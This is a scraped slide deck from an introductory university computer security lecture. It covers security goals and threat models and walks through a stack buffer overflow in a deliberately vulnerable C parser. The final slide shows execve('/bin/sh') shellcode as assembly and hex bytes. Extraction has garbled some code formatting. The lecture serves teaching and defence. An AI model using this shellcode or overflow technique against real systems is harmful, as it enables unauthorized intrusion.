Day 1-1-intro-sw-vuls

662 views
565 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
662
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
21
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • Example 1: EmailAllow users to send desirable email, delivered to recipients Prevent delivery of bulk unwanted email (spam)Example 2: Web browsingAllow web users to visit many sites, in different browser tabsPrevent one visited site from interfering with session at anotherExample 3: Network infrastructureAllow hosts to communicate over the networkPrevent malicious hosts from causing denial of service
  • Dawn: CIA
  • Dawn: add graphics online banking
  • Dawn: CIA
  • Dawn: graphics
  • Dawn: add graphics
  • Dawn: add graphics
  • Dawn: add graphics, house + attackers
  • Dawn:Add graphics
  • Dawn: add animation & graphs for 2nd bullet
  • Dawn: add graphics
  • Dawn: add graphics * systems, security goals, threat model
  • Dawn: add graphics; network eavesdropper, active network attacker who can modify traffic, 0-day exploit, physical access to hardware, break crypto using quantum computersMax: it was pretty difficult to find images of all of these- I’ve included (from left to right) an image of a DOS attack, network eavesdropping (top), a MITM attack (bottom), and a “DES Cracker circuit board fitted with 32 Deep Crack chips and some control chips.” (images are taken from OWASP and Wikipedia)
  • Dawn: add graphics & animation
  • Dawn: add the same graphics for bullet 2 as before
  • Dawn: add graphics: C vs. Java, Chrome,
  • Chart w/ info fromwikipedia regarding browser vulnerabilities
  • Add figure: server and browser, http request & response
  • There was one more automated software audit tool…what was it…
  • ANI bug happened because /GS was not applied to function LoadAniIcon() since it did not contain string buffers. Visual Studio 2010 applies /GS protection more aggressively.
  • SAFESEH: safe structured exception handlingSEHOP: structured exception handling overwrite protection. Enabled with a regkeyDisableExceptionChainValidation.
  • Day 1-1-intro-sw-vuls

    1. 1. Computer Security Course. Dawn Song Introduction Dawn Song 1
    2. 2. Intro to InstructorBorn in Dalian, China Prof., UC BerkeleyClose to Korea PhD, UC Berkeley Summer school Prof., CMU Sep, 2002 Jul, 2007 Aug, 2012 http://www.cs.berkeley.edu/~dawnsong dawnsong@cs.berkeley.edu Dawn Song 2
    3. 3. Research Interests & Projects• Computer security & privacy• BitBlaze: Binary analysis for computer security• WebBlaze: New technologies to enhance web security• DroidBlaze: Android security analysis infrastructure• Machine learning & security• Platform for private data Dawn Song 3
    4. 4. BitBlaze: Computer Security via Program Binary Analysis Unified platform to accurately analyze security properties of binaries  Security evaluation & audit of third-party code  Defense against morphing threats  Faster & deeper analysis of malware Detecting Generating Dissecting Vulnerabilities Filters Malware BitBlaze Binary Analysis Infrastructure Dawn Song 4
    5. 5. WebBlaze: New Security Technologies for the Web• Does the browser correctly enforce desired security policy? – Cross-origin capability leaks: attacks & defense [USENIX 09]• Is third-party content such as malicious ads securely sandboxed? – Preventing Capability Leaks in Secure JavaScript Subsets [NDSS10]• Do browsers & servers have consistent interpretations/views to enforce security properties? – Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense [NDSS09] – Content sniffing XSS: attacks & defense [IEEE S&P 09]• Do applications have security vulnerabilities? – Symbolic Execution Framework for JavaScript [IEEE S&P10]• Do different web protocols interact securely? – Model checking web protocols [CSF 10]• How to build secure web applications by construction? – Context-sensitive auto-sanitization in web applications [CCS 11]• How to reduce TCB in web applications? – Privilege Separation in HTML5 Applications [USENIX Security 12] Dawn Song 5
    6. 6. DroidBlaze Apps Static App Runner VMAnalysis Execution Static Data ExecutionAnalyzer Exploration App DynamicRewriter Rewritten App Analysis Behavior Analysis Analyzed Behavior Property Apps Analyzer Checker Dawn Song 6
    7. 7. bitblaze.cs.berkeley.eduwebblaze.cs.berkeley.edudroidblaze.cs.berkeley.edu
    8. 8. Intro of Students• Name• Institution• Areas of interest – Systems? Programming languages? AI? Theory?• Background in computer security – Have you taken a computer security class? – Have you done research in computer security?• Find partners for labs Dawn Song 8
    9. 9. Overview of Lectures• Syllabus• Labs: hands-on experience• TAs – Dylan – Taebum Dawn Song 9
    10. 10. Overview of LecturesDate/Time Topic NotesPart 1: Software SecurityMon Aug 20 Software Security (I.1): Vulnerabilities, Attacks & Defenses. Different classes of(09:00-12:00) vulnerabilities and attacks. Runtime defenses.(13:00-18:00) Software Security (I.2): Deeper look at vulnerabilities and attacks (Lab Session)Tues Aug 21 Software Security (II.1): Automatic vulnerability discovery. Static Analysis. Dynamic(09:00-12:00) Analysis. Symbolic Execution(13:00-18:00) Software Security (II.2): Tools for software security analysis and vulnerability discovery (Lab Session)Part 2: Web SecurityWed Aug 22 Web Security (I.1): Vulnerabilities & attacks. Overview of web security. Different classes of(09:00-12:00) web vulnerabilities and attacks(13:00-18:00) Web Security (I.2): Vulnerabilities & attacks. Deeper look at web vulnerabilities & attacks (Lab Session)Thurs Aug 23 Web Security (II.1): Automatic vulnerability discovery & defense. Automatic analysis(09:00-12:00) techniques and tools to detect web vulnerabilities. New security primitives and mechanisms for defenses(13:00-18:00) Web Security (II.2): Automatic vulnerability discovery & defense. Deeper look at web (Lab Session) defensesPart 3: Malware and Mobile SecurityFri Aug 24 Malware and Mobile Security (1): Overview of malware. Worms and botnets. Overview of(09:00-12:00) mobile security. Different classes of vulnerabilities & attacks. State-of-the-art defenses(13:00-18:00) Dawn Song Malware and Mobile Security (2): Deeper look at mobile vulnerabilities & attacks (Lab10 Session)
    11. 11. Computer Security Course. Dawn Song Introduction to Computer Security: Goals & Threat Models Dawn Song 11
    12. 12. What is Computer Security About?• General goals: – Allow intended use of computer systems – Prevent unintended use that may cause harm• Examples: – Only share your photos & location with friends – Don’t want attackers install key-logger on your machine to steal your password Dawn Song 12
    13. 13. Why Should You Care?• It impacts your day-to-day life Dawn Song 13
    14. 14. Why Should You Care?• It impacts everybody’s day-to-day life – Millions of computers compromised – Millions of passwords stolen Dawn Song 14
    15. 15. What is Computer Security About?• General goals: – Allow intended use of computer systems – Prevent unintended use that may cause harm• More precisely… Dawn Song 15
    16. 16. Basic Security Properties: CIA• Confidentiality• Integrity• Availability Dawn Song 16
    17. 17. Basic Security Properties (I)• Confidentiality: – Information is only disclosed to authorized people or systems – E.g., attackers cannot learn your banking info Dawn Song 17
    18. 18. Basic Security Properties (II)• Integrity: – Information cannot be tampered with in an unauthorized way – E.g., attacker cannot change the balance of your bank account Dawn Song 18
    19. 19. Basic Security Properties (III)• Availability: – Information and services are accessible in a timely fashion to authorized people or systems – E.g., you should be able to login and perform transactions on your online banking account when you want to Dawn Song 19
    20. 20. Basic Security Properties: CIA• Confidentiality• Integrity• Availability Dawn Song 20
    21. 21. Security Analysis• Given a computer system, one may ask: Is the computer system secure? Dawn Song 21
    22. 22. Is the House Secure? Dawn Song 22
    23. 23. It Depends …• What are the assets? What are the goals? Dawn Song 23
    24. 24. It Depends …• Threat model – In SafeLand, you don’t need to lock the door – Attackers who pick locks – Attackers who drive a bull-dozer – Attackers who have super advanced technology – Attackers who may know you well Dawn Song 24
    25. 25. Is the House Secure?• Is the house’s protection mechanism strong enough to protect the assets from attackers in a certain threat model? Dawn Song 25
    26. 26. Which Threat Model Should You Choose? ? Dawn Song 26
    27. 27. Cost of Security• Should you always build & evaluate a system secure against the strongest attacker? – A student may simply not be able to afford an alarm system• Not about perfect security Perfect Security Risk Analysis Dawn Song 27
    28. 28. Is the Computer System Secure?• Is the system’s protection mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model? Dawn Song 28
    29. 29. Key Elements to Security AnalysisSecurityproperties Security Analysis ? Threat Model Dawn Song 29
    30. 30. Threat Model• Assumptions on attackers’ abilities and resources Network Eavesdropper 0Day DES Cracker DDoS MITM Attack Dawn Song 30
    31. 31. Which Threat Models to Choose?• For the grade database system for your class?• For your phone?• For a major online banking site?• For the system to control nuclear weapon launch? Dawn Song 31
    32. 32. Cost of Security• There’s no free lunch.• There’s no free security.• Cost of security – Expensive to develop – Performance overhead – Inconvenience to users Dawn Song 32
    33. 33. Prioritize Your Security Solution according to Your Threat Model• No one wants to pay more for security than what they have to lose• Not about perfect security – Risk analysis Perfect Security Risk Analysis Dawn Song 33
    34. 34. Changing Threat Model • Be careful when your threat model changes – E.g., online account Over time….New account, nothing of value; Account accumulates value;No incentive for attackers More incentive for attackers Dawn Song 34
    35. 35. Design Impacts Cost of Security• Good system design & architecture can reduce cost of security Dawn Song 35
    36. 36. Design Impacts Cost of Security Known unpatched vulnerabilities Secunia SecurityFocus Browser Extremely critical Highly critical Moderately critical Less critical Not critical Total (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) 1Google Chrome 16 0 0 0 0 0 13 December 2011 4 8 12 534Internet Explorer 6 0 0 17 November 2004 27 February 2004 5 June 2003 20 November 2000 1 4 9 213Internet Explorer 7 0 0 30 October 2006 6 June 2006 5 June 2003 15 August 2006 1 7 123Internet Explorer 8 0 0 0 26 February 2007 5 June 2003 14 January 2009 1 26Internet Explorer 9 0 0 0 0 6 December 2011 5 March 2011 1Firefox 3.6 0 0 0 0 0 20 December 2011Firefox 9 0 0 0 0 0 0 1 2Opera 11 0 0 0 0 6 December 2011 6 December 2011 1 2Safari 5 0 0 0 0 8 June 2010 13 December 2011"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>. Dawn Song"Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>. 36
    37. 37. BreakDawn Song 37
    38. 38. Computer Security Course. Dawn Song Software Security (I): Buffer-overflow Attacks Dawn Song 38
    39. 39. Intro HTTP REQUEST CLIENT HTTP RESPONSE EXPLOIT Remote ShellCLIENT ATTACKER SERVER Dawn Song 39
    40. 40. Linux (32-bit) process memory layout -0xFFFFFFFF Reserved for Kernal -0xC0000000 user stack %esp shared libraries -0x40000000 brk run time heap static data segmentLoaded from exec text segment (program) -0x08048000 unused -0x00000000
    41. 41. -0xC0000000 Stack Frame To previous stack frame pointer user stack arguments return address stack frame pointer exception handlersshared libraries To the point at which -0x40000000 this function was called local variablesrun time heap callee saved registers static data segment text segment (program) -0x08048000 unused -0x00000000
    42. 42. Stack Frame1:void copy_lower (char* in, char* out) {2: int i = 0;3: while (in[i]!=‘0’ && in[i]!=‘n’) {4: out[i] = tolower(in[i]);5: i++;6: }7: buf[i] = ‘0’;8:} 9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 128, fp);12: int header_ok = 0;13: if (cmd[0] == ‘G’)14: if (cmd[1] == ‘E’)15: if (cmd[2] == ‘T’)16: if (cmd[3] == ‘ ’)17: header_ok = 1;18: if (!header_ok) return -1;19: url = cmd + 4;20: copy_lower(url, buf);21: printf(‚Location is %sn‛, buf);22: return 0; } A quick example to illustrate multiple stack frames
    43. 43. Viewing Stack Frame with GDB Our example modified to include a main functionCompile: parse.c gcc –g parse.c –o parse 1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]);Run: 5: i++; 6: } ./parse 7: buf[i] = ‘0’; 8:} 9:int parse(FILE *fp) { 10: char buf[5], *url, cmd[128];Debug: 11: fread(cmd, 1, 128, fp); We can debug using gdb. 12: int header_ok = 0; 13: if (cmd[0] == ‘G’) gdb parse 14: if (cmd[1] == ‘E’) 15: if (cmd[2] == ‘T’) 16: if (cmd[3] == ‘ ’) Then we can take a look at the stack. 17: header_ok = 1; 18: if (!header_ok) return -1; (gdb) break 7 19: url = cmd + 4; 20: copy_lower(url, buf); (gdb) run 21: printf(‚Location is %sn‛, buf); (gdb) x/64x $esp 22: return 0; } 23: /** main to load a file and run parse */
    44. 44. Viewing Stack Frame with GDB Our running example modified to illustrate multiple stack framesDebug: parse.c (gdb) x/64x $esp
    45. 45. What are buffer overflows? parse’sparse.c frame 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 args fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 ret address return address 5: i++; 0xbffff758 0xbffff778 frame ptr stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf02224c local variables buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c callee saved 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } registers 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out args 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac ret address return address 0x080485a2 GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA frame ptr 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c local variables i 0x00000000 callee saved registers copy_lower’s (Unallocated) frame
    46. 46. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf022261 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000000 i (Unallocated)
    47. 47. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf026161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000001 i (Unallocated)
    48. 48. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000002 i (Unallocated)
    49. 49. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000003 i (Unallocated)
    50. 50. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef2061 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000004 i (Unallocated)
    51. 51. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbfef6161 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000005 iUh oh…. (Unallocated)
    52. 52. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url 8:} 0xbffff748 0x00000001 header_ok 9:int parse(FILE *fp) { 0xbffff744 0xbf616161 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000005 iUh oh…. (Unallocated)
    53. 53. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x0804a008 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address 5: i++; 0xbffff758 0xbffff778 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x0000000d iUh oh…. (Unallocated)
    54. 54. What are buffer overflows?parse.c 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x61616161 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000019 iUh oh…. (Unallocated)
    55. 55. What are buffer overflows? 0x61616161parse.c 0x61616161 0x61616161 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x61616161 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address 5: i++; 0xbffff758 0x61616161 stack frame ptr 6: } 7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url 8:} 0xbffff748 0x61616161 header_ok 9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4] 10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0] 11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125] . . . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 0x41414141 . cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0] 20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url 21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok 22: return 0; } 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000025 iUh oh…. (Unallocated)
    56. 56. What are buffer overflows? 0x61616161parse.c 0x61616161 0x61616161 1:void copy_lower (char* in, char* out) { 2: int i = 0; 0xbffff760 0x61616161 fp 3: while (in[i]!=‘0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address 5: i++; 0xbffff758 stack frame ptr 6: } 0x61616161 7: buf[i] = ‘0’; 0xbffff74c url 8:} 0x61616161 0xbffff748 header_ok 0x61616161 9:int parse(FILE *fp) { 0xbffff744 buf[4] 0x61616161 10: char buf[5], *url, cmd[128]; 0xbffff740 buf[3,2,1,0] 0x61616161 11: fread(cmd, 1, 256, fp); 0xbffff73c cmd[128,127,126,125] . 0x00000000 . 12: int header_ok = 0; . . . . . . . . 0xbffff6c4 . . 0x41414141 cmd[7,6,5,4] 19: url = cmd + 4; 0xbffff6c0 cmd[3,2,1,0] 20: copy_lower(url, buf); 0x20544547 0xbffff74c url 21: printf(‚Location is %sn‛, buf); 0xbffff6c4 0xbffff748 header_ok 22: return 0; } 0x00000001 23: /** main to load a file and run parse */ 0xbffff6b4 0xbffff740 out 0xbffff6b0 0xbffff6c4 infile (input file) 0xbffff6ac 0x080485a2 return address GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0xbffff6a8 0xbffff758 stack frame ptr 0xbffff69c 0x00000025 iAnd when you try to return from parse…… SEGFAULT, since 0x61616161 is not avalid location to return to. (Unallocated)
    57. 57. Basic Stack Exploit• Overwriting the return address allows an attacker to redirect the flow of program control• Instead of crashing, this can allow arbitrary code to be executed – Code segment called “shellcode”• Example: the execve system call is used to execute a file – With the correct permissions, execve(“/bin/sh”) can be used to obtain a root-level shell. Dawn Song 57
    58. 58. Shellcode of execve• How to develop shellcode that runs as execve(“/bin/sh”)? 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebpvoid main() { 0x80002bf <__execve+3>: pushl %ebx char *name[2]; The procedure prelude. (disassembly of execve call)* name[0] = "/bin/sh"; 0x80002c0 <__execve+4>: movl $0xb,%eax name[1] = NULL; Copy 0xb (11 decimal) onto the stack. This is the execve(name[0], name, NULL); index into the syscall table. 11 is execve.} 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx Copy the address of "/bin/sh" into EBX.(format instructions and data as characters)* 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx Copy the address of name[] into ECX. 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx Copy the address of the null pointer into %edx. “xebx1fx5ex89x76x08x31xc0x88x46x46 0x80002ce <__execve+18>: int $0x80 x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c Change into kernel mode. xcdx80x31xdbx89xd8x40xcdx80xe8xdcx ffxffxff/bin/sh” Dawn Song details, refer to Smashing the stack by aleph one *For more 58
